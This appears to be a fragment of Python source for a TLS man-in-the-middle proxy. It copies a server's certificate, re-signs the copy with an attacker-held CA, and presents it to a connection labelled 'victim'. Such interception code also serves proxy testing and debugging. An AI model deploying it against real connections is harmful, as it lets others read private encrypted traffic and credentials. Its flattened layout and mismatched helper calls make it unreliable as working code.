def dupe_socket_cert(soc, ca): cert_der = soc.getpeercert(True) cert_pem_buggy = ssl.DER_cert_to_PEM_cert(cert_der) cert_pem = cert_pem_buggy.replace("-----END CERTIFICATE-----", "\n-----END CERTIFICATE-----") cert = crypto.load_certificate(crypto.FILETYPE_PEM, cert_pem) new = dupecert.dupe(cert) dupecert.sign(ca, new) return new
def _start_mitm(self): if self._started: return server = SSL.Connection(self._mk_ctx(), self.server_plain) server.set_connect_state() server.do_handshake() fake_cert_pkey = dupecert.dupe(self.ca_cert, self.ca_key, server.get_peer_certificate()) victim = SSL.Connection(self._mk_ctx(cert_pkey=fake_cert_pkey), self.victim_plain) victim.set_accept_state() victim.do_handshake() self.server = server self.victim = victim self._started = True